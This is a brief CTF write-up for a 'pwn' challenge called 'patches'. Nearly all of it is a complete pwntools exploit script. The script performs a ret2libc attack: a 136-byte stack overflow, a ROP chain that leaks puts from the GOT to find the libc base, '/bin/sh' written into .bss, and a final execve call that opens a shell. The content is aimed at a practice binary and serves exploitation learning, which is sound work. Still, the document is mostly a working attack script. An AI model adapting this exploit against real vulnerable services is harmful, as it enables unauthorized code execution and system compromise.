Tags: pwn ret2libc
Rating:
Basic Ret2Libc
Note :- I did not play this CTF, Just checked challenges after the CTF is over
```CSS
#!/usr/bin/python
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'DEBUG'
context(terminal=['tmux','new-window'])
p = process('./patches')
#p = gdb.debug('./patches','b main')
e = ELF('./patches')
libc = ELF('./libc-2.31.so')
JUNK = "A"*136
pop_rdi = e.search(asm('pop rdi; ret')).next()
pop_rsi = e.search(asm('pop rsi; pop r15; ret')).next()
gets = e.plt['gets']
plt_puts = e.plt['puts']
got_puts = e.got['puts']
bss = e.get_section_by_name('.bss')["sh_addr"] + 1200
main = e.symbols['main']
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_rdi) + p64(got_puts) + p64(plt_puts) + p64(pop_rsi) + p64(0) + p64(0) + p64(main)
p.recvuntil("> ")
p.sendline(payload)
p.sendline("/bin/sh\x00")
leak = u64(p.recvline().strip().ljust(8,'\x00'))
libc.address = leak - libc.symbols['puts']
print hex(libc.address)
execve = libc.symbols['execve']
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(0) + p64(execve)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
```